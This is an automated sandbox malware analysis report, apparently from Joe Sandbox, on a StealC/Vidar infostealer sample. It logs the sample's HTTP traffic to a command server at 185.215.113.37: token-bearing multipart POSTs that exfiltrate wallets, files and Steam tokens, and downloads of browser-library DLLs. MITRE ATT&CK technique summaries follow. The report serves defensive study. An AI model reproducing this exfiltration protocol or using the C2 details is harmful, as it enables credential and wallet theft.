6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------AAAEBAFBGIDHCBFHIECFContent-Disposition: form-data; name="message"fplugins------AAAEBAFBGIDHCBFHIECF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBHost: 185.215.113.37Content-Length: 6531Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKEBGDHDAFHJKEGIIDHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="file"------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 4b 4a 44 42 4b 4a 4a 4a 4b 46 48 44 41 45 42 2d 2d 0d 0a Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="file"------CFBAKKJDBKJJJKFHDAEB--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="message"wallets------FBKFCFBFIDGCGDHJDBKF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFCAAECBGDGDHIEHJHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 2d 2d 0d 0a Data Ascii: ------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------BAECFCAAECBGDGDHIEHJContent-Disposition: form-data; name="message"files------BAECFCAAECBGDGDHIEHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 2d 2d 0d 0a Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="file"------CBFBGCGIJKJJKFIDBFCG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFIEHCFIECBGCBFHIJJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------FCFIEHCFIECBGCBFHIJJContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------FCFIEHCFIECBGCBFHIJJContent-Disposition: form-data; name="message"ybncbhylepme------FCFIEHCFIECBGCBFHIJJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGIIJDHCGCBKECBFIJKK--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

